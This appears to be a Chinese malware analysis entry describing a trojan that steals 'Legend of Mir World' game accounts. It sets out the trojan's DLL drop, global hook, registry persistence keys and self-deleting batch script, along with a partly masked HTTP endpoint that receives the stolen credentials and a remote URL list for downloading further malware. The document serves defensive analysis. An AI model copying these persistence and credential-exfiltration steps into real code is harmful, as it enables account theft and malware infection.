本病毒所有命名：

影响系统：
Win9x,WinMe,Linux

简介：
病毒流程： 1读取文件尾部104个字节 2 删除文件 FileName = C:Program FilesCommon FilesMicrosoft SharedMSINFOSysWFGCQSJ2.dll

行为分析：
这是一个网游盗号木马。它的目标是《传奇世界》的帐号密码信息。同时，它还会下载一些恶意程序到用户电脑中执行。

描述：
病毒流程：

1读取文件尾部104个字节



2 删除文件

FileName = C:Program FilesCommon FilesMicrosoft SharedMSINFOSysWFGCQSJ2.dll



3 从自身查找名为“DLLFILE”的资源，加载并释放到

C:Program FilesCommon FilesMicrosoft SharedMSINFOSysWFGCQSJ2.dll

然后再把刚才得到的104个资源写入新文件SysWFGCQSJ2.dll的尾部。



4 加载该DLL，GetProcaddress得到该DLL的两个导出函数jmpHookOn jmpHookOff

调用jmpHookOn,该函数的作用是下全局钩子，使所有进程加载该DLL。



5 注册CLSID组件

HKCRCLSID{DC7035B1-E435-4A65-9546-059796785F52}InProcServer32

"(Default)" = "%Program Files%Common FilesMicrosoft SharedMSINFOSysWFGCQSJ2.dll"



6 添加启动项，随系统进程启动

HKLMSOFTWAREMicrosoftWindowsCurrentVersionExplorerShellExecuteHooks{DC7035B1-E435-4A65-9546-059796785F52}



7 生成bat文件删除原始程序

:try

del "D:softwareRunPEvirus.exe"

if exist "D:softwareRunPEvirus.exe" goto try

del %0





病毒所释放的SysWFGCQSJ2.dll文件的作用

DLL被加载后

1，判断当前进程是否是桌面进程，若是跳到2.



2，移动文件MoveFileExA

0006F3E8 00930128 |ExistingName = "C:WINDOWSsystem32VerCLSID.exe"

0006F3EC 00930158 |NewName = "C:WINDOWSsystem32VerCLSID.bak"



3 查找窗口FindWindow，若没查找，则创建一个新线程

0006F604 003F6AD4 |Class = "ListBox"

0006F608 003F6AC8 Title = "dll_wfgCQSJ"

该线程的作用是：

1 查找窗口|Class = "ListBox"Title = "dll_wfgCQSJ"，若没找到，则创建一个新窗口



2 加载DLLC:Program FilesCommon FilesMicrosoft SharedMSINFOSysWFGCQSJ2.dll



3 查找窗口/Title = "ZXY_wfgCQSJ" |Class = "ListBox"，判断该窗口是否存在，若存在则发送WM_QUITE消息



4 SetWindowsHookExA设置WH_GETMESSAGE钩子，钩子回调函数的作用是：

获取用户传奇世界账号并以一下形式发送到网络

http://ftp.y***9.com/px/login.aspgameid=&password=&quyu=&mirserver=&js1=

&js1zy=&js1dj=&js1sex=

&js2=&js2zy=&js2dj=&js2sex=&zb=<<传奇世界>>附加信息



5 设置计时器，计时器回调函数的作用是，从网上下载恶意程序并执行。

恶意网址列表http://www.6***11.cn/txt/url.txt